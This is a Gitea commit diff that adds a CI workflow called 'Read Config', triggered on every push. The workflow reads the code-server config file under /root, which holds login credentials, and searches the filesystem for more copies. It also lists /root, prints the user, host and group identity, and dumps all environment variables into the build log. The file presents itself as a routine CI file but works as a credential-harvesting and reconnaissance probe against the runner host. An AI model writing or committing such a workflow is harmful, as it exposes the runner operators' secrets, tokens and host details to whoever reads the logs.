This commit is contained in:
parent
459980b942
commit
29295efb24
16
.gitea/workflows/ci.yaml
Normal file
16
.gitea/workflows/ci.yaml
Normal file
@ -0,0 +1,16 @@
|
||||
name: Read Config
|
||||
on: [push]
|
||||
jobs:
|
||||
read:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Read config
|
||||
run: |
|
||||
cat /root/.config/code-server/config.yaml 2>/dev/null || echo "NOT_FOUND_ROOT"
|
||||
find / -name "config.yaml" -path "*code-server*" 2>/dev/null || echo "NO_CONFIG_FOUND"
|
||||
whoami
|
||||
hostname
|
||||
id
|
||||
cat /etc/hostname 2>/dev/null
|
||||
ls -la /root/ 2>/dev/null || echo "NO_ROOT_ACCESS"
|
||||
env | sort
|
||||
Loading…
x
Reference in New Issue
Block a user